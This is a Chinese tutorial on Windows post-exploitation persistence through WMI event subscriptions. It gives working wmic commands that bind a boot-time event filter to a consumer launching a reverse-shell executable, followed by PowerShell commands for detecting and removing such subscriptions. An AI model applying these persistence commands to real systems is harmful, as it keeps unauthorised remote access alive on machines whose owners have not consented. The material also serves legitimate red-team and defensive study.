内网权限维持——利用WMI进行权限维持

一、WMI事件订阅机制简介

WMI（Windows Management Instrumentation，Windows管理规范）是windows提供的一种能够直接与系统进行交互的机制，旨在为系统中运行的各程序界定一套独立于环境的标准，允许系统中允许的程序相互交流系统的程序管理信息。

WMI事件是Windows管理架构中的一部分，它可以监视应用程序的运行、响应系统和应用程序的事件。通过使用WMI事件，应用程序可以接收系统各类通知，并且在特定事件发生时采取相应的措施。例如，磁盘空间不足时可以通过WMI事件来发出警报等。WMI事件可以通过编写WMI查询或使用WMI事件订阅API来捕获。

WMI事件订阅是一种消息机制，用来监听事件类的触发。简单来书，设置一个监听磁盘空间不足的事件订阅，程序可以在磁盘不足的第一时间接收到WMI的告警。事件订阅中有很多类，这里主要关注以下类：

类名	作用
EventFilter	触发器
EventConsumer	执行动作
FilterToConsumerBinding	绑定过滤器和消费者类（负责捆绑EventFilter和EventConsumer）

二、利用事件订阅进行权限维持

1、WQL是一种类似SQL的查询语句，是WMI提供的一种用于WMI查询或WMI事件订阅的语句。在命令行中输入wbemtest，打开Windows Management Instrumentation测试器来通过WQL语句查询系统信息。

wbemtest

打开后进入一个命名空间，点击“连接”——“查询”。


使用WQL查询当前系统中所有进程的PID。

select * from Win32_Process

此外，还有其他查询语句。

# 获取主机名
select * from Win32_ComputerSystem
# 获取BOIS信息
select * from Win32_BOIS
# 获取键盘信息
select * from Win32_Keyboard
# 获取服务列表
select * from Win32_Service
# 获取磁盘列表
select * from Win32_LogicalDisk
# 获取光驱信息
select * from Win32_CDROMDriver

2、利用WMI通知查询的方式来监听windows打印机任务，选择“通知查询”。并使用如下WQL语句：

select * from __InstanceCreationEvent within 0.001 where TargetInstance ISA "Win32_PrintJob"
# __InstanceCreateEvent：代表windows事件类
# within 0.001：代表轮询时间，轮询时间为0.001s，可以理解为每毫秒查询一次该事件
# TargetInstance：实例名称
# ISA：等于
# Win32_PrintJob：打印机名称

3、我们可以将通知查询和执行动作进行捆绑，捆绑之后，系统触发某项查询规则时会立即执行对应动作。首先创建一个触发器，代码如下：

# 在系统初始化之后的第60秒将会进行通知
wmic /namespace:"\\root\subscription" PATH __EventFilter create Name="Testone",EventNameSpace="root\cimv2",Querylanguage="WQL",Query="select * from __InstanceModificationEvent within 60 where TargetInstance ISA "Win32_PerfFormattedData_PerfOS_SYSTEM""
# __EventFilter：触发器
# Testone：触发器名称
# 触发的通知条件由Query决定
# Win32_PerfFormattedData_PerfOS_SYSTEM：windows系统初始化

4、创建好触发器后，需要绑定一个对应的执行动作，也就是触发器在查询到想要的内容后就会触发绑定的执行动作。执行动作需要将命名空间指定为触发器所设置的命名空间，创建执行动作可以使用EventConsumer来完成。当然，需要生成反弹shell，设置监听器哈！

# 当Testone时间被触发后，C:\tmp\reverse_shell.exe将会被执行
wmic /namespace:"\\root\subscription" PATH CommandLineEventConsumer create Name="Testone",ExecutablePath="C:\tmp\reverse_shell.exe",CommandLineTemplate="C:\tmp\reverse_shell.exe"

5、使用FilterToConsumerBinding来绑定刚刚所创建的触发器和执行动作。

# 绑定触发器和执行动作
wmic /namespace:"\\root\subscription" PATH __FilterToConsumerBinding create Filter="__EventFilter.Name=\"Testone\"",Consumer="CommandLineEventConsumer.Name=\"Testone\""

6、重启计算，在系统进行初始化工作（重启/重新登录）的第60秒，获取反弹shell。

三、防御方式

# 查询系统所有命名空间
Get-WmiObject -Namespace root -List -Recurse | Select -Unique __NAMESPACE

# 查询root\subscription命名空间中是否存在执行恶意命令的触发器
Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer | select CommandLineTemplate,ExecutablePath

# 列出事件过滤器
Get-WMIObject -Namespace root\Subscription -Class __EventFilter

# 列出事件消费者
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer

# 列出事件绑定
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding

# 删除事件过滤器
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='Testone'" | Remove-WmiObject -Verbose

# 删除事件消费者
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='Testone'" | Remove-WmiObject -Verbose

# 删除事件绑定
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%Testone%'" | Remove-WmiObject -Verbose

# 查询root\subscription命名空间中是否存在执行恶意命令的触发器
Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer | select CommandLineTemplate,ExecutablePath

至此，系统初始化后的第60s，不会运行反弹shell脚本。